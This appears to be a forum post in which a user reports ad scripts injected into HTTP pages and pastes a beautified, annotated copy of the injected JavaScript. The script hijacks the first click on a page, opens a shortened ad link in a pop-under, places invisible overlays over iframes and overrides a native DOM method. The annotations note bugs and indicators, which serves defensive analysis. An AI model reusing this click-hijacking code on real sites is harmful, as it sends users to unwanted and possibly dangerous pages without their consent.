My quick patch to this problem was to block any DNS request to that domain.
This probably does not solve the problem at its root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in `http` requests,
- they intercept any first click bubbling to the `<html>` tag,
- they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't look dangerous; it just makes you open a new page with ads and potentially dangerous clickbait.
I've partially beautified it below:
// Configuration and shared state of the injected click-hijacking script.
// NOTE(review): descriptive names such as urlOfDamnation look like they were
// chosen while beautifying; the PP* and _0x50e8x* names look original.
// Confirm against the raw sample before writing signatures on any name.

// Identifier suffix appended to the cookie names "PP_CL" and "PP_ID" below.
var PPid = "p20161003pr";
// Extra strings that bcStart() appends to the destination URL with "&" (empty here).
var PPRet = [];
// Lower-cased user agent; only used to choose the tab-opening path in openNewTab().
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
// Only read by setV(), which copies it into an unused local; purpose not visible here.
var PPdl = "3";
// Space-separated lists of element ids, split into arrays below. chPrnt() selects
// PPwl for kind "w" and PPbl otherwise; presumably an allow-list and a block-list.
// Both are empty in this sample.
var PPbl = "";
var PPwl = "";
// Width threshold: only elements whose offsetWidth exceeds this get an overlay div.
var PPmw = 450;
// Destination opened on the hijacked click. It is a goo.gl short link, so the final
// landing page cannot be determined from this listing.
var urlOfDamnation = "https://goo.gl/Vjh91p";
// Click counts at which the redirect fires; [1] means the first click on the page.
var PPcl = [1].sort();
// Running click counter (also restored from the "PP_CL" cookie when present).
var PPcc = 0;
// Click count currently armed (next value taken from PPcl), or false when none is left.
var PPac;
// Turn the id lists into arrays; an empty string becomes an empty array.
PPbl = PPbl == "" ? [] : PPbl.split(" ");
PPwl = PPwl == "" ? [] : PPwl.split(" ");
/**
 * Reports whether a value is defined.
 * @param {*} _0x50e8x14 - value to check
 * @returns {boolean} false when the argument is undefined, true otherwise
 */
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
/**
 * Checks whether a DOM node, or one of its ancestors, has an id found in an id list.
 * @param {Node|null} _0x50e8x19 - node to start from; the search recurses through parentNode
 * @param {string} _0x50e8x14 - "w" selects PPwl, any other value selects PPbl
 * @returns {boolean} true when a matching id was found on the node or an ancestor
 */
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
// `l` is never declared, so in sloppy mode this creates an implicit global.
l = _0x50e8x14 == "w" ? PPwl : PPbl;
// With an empty list (as in this sample) nothing is compared and no ancestor is visited.
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
// NOTE(review): the loop is bounded by the selected list `l`, but the comparison
// always reads PPbl, even for kind "w". This looks like a bug in the sample.
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
// Removes the implicit global again before recursing.
;delete l;
// No match on this node: continue with its parent.
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
/**
 * Registers openNewTab as a click handler on `document`.
 *
 * The function declares no parameters, so the element that callers pass in is
 * ignored and the handler always lands on `document`. The addEventListener call
 * uses capture = false, i.e. it sees clicks that bubble up from anywhere on the page.
 */
function attachOpenNewTabOnClick() {
// Legacy IE event API first, standard DOM API otherwise.
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
/**
 * Takes the next trigger click count off the front of PPcl.
 * @returns {number|boolean} the removed entry, or false when PPcl is empty
 */
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
/**
 * Called by the script with a cookie name and a value ("PP_CL..." / "PP_ID...").
 *
 * NOTE(review): as listed, the body never touches document.cookie. It only copies
 * PPdl into a local and sets a Date to its own current time. The page says the
 * script was only partially beautified, so the cookie write may have been lost;
 * compare with the raw sample before concluding that no cookie is set.
 * @param {string} _0x50e8x20 - cookie name passed by callers (unused in this listing)
 * @param {*} _0x50e8x21 - value passed by callers (unused in this listing)
 */
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
/**
 * Reads one cookie from document.cookie.
 * @param {string} cookieKey - cookie name, without the trailing "="
 * @returns {string|null} the unescape()d value, or null when the cookie is not present
 */
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
// Look for the key after a "; " separator first.
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
// Otherwise the key only counts when it is the very first cookie in the string.
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
// Skip the "; " separator so the index points at the key itself.
cookieStartIndex += 2
}
// The value runs up to the next ";" or to the end of the cookie string.
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
/**
 * Click handler: counts clicks and, on the armed click count (PPac), opens
 * urlOfDamnation in a new tab or window.
 *
 * Artifacts an analyst can look for on an affected page: cookies named
 * "PP_CL" + PPid and "PP_ID" + PPid + "." + <count>, and div elements with
 * class "mtaddiv". Whether the cookies are ever written cannot be confirmed
 * from this listing, because setV() has no visible cookie write.
 */
function openNewTab() {
// Click count so far: from the "PP_CL" cookie when present, else the in-memory counter.
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
// Fire only once per armed count: no "PP_ID" marker yet and the count matches.
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
// Opera/Chrome path: a detached <a target="_blank"> receives a synthetic click.
// The initMouseEvent arguments set ctrlKey to true and button to 1.
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
// Other browsers: open a screen-sized window with a random name, hand focus back
// to the opener, then point the new window at the destination.
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
// mozPaintCount is a Firefox-only property, so the extra open/close runs only there.
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
// After firing, collapse and hide every overlay div so the page is usable again.
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
// Arm the next click count, or false when PPcl is exhausted.
;PPac = PPnCL()
}
// When the NEXT click is the armed one, cover iframe/object/embed elements with overlays.
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
/**
 * Places an absolutely positioned div with class "mtaddiv" over every element of
 * the given tag that is wider than PPmw and passes the id-list checks.
 *
 * Presumably the overlay exists because clicks inside an iframe or plugin never
 * reach the parent document's click handler, while a click on the overlay does.
 * The div is given no content or background here, so it is likely invisible.
 * Unexpected div.mtaddiv elements in the DOM are a direct indicator of this script.
 * @param {string} tagName - tag to cover; the script calls this with "iframe", "object" and "embed"
 */
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
// All errors are swallowed so the host page shows no visible failure.
try {
// Skip when the marker cookie for the armed click count already exists.
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
// A non-empty PPwl requires the element or an ancestor to match via chPrnt(.., "w").
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
// A non-empty PPbl excludes elements that match via chPrnt(.., "b").
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
// Convert the viewport rectangle into page coordinates: scroll offset added,
// client border offset subtracted.
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
// Same position and size as the covered element, stacked at z-index 899.
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
// attachOpenNewTabOnClick() ignores its argument and attaches to `document`.
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
/**
 * One-time initialisation: restores the click counter, arms the next trigger
 * count, finalises the destination URL and installs the click handler.
 * Guarded by startScript, so a second call does nothing.
 */
function bcStart() {
if (!startScript) {
startScript = !0;
// Restore the click count from the "PP_CL" cookie, defaulting to 0.
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
// Advance to the first trigger count that is still ahead of the current click count.
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
// Every trigger count already passed: disarm.
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
// Append each PPRet entry to the destination URL, prefixed with "&".
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
// If the very next click is the armed one, cover iframe/object/embed elements now.
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
// For every id in PPbl, install an onmouseup handler that stops event propagation.
// This overwrites any onmouseup the host page had set on that element.
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
// Install the click handler. Both branches end up on `document`, because
// attachOpenNewTabOnClick() ignores the element it is given.
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
// Start-up: bcStart runs on window load, with a 3-second timer as fallback.
// startScript is bcStart's run-once flag.
// The load handlers call clearInterval on a setTimeout handle; bcStart's own guard
// prevents a second run either way.
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
// Legacy IE path; failures are swallowed so the host page shows no error.
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
// Replaces document.getElementsByClassName for the whole page with a hand-rolled
// version that scans every element and returns a plain array. The assignment is
// unconditional, so the host page's own scripts also get this replacement. A
// non-native document.getElementsByClassName is therefore another indicator.
// NOTE(review): "\b" inside a string literal is a backspace character, not a regex
// word boundary, so as listed the pattern would not match ordinary class names.
// The raw sample may have had "\\b" with the escape lost in beautification or
// extraction; confirm against the original.
document.getElementsByClassName = function(className) {
var matchingElements = [];
className = new RegExp("\b" + className + "\b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}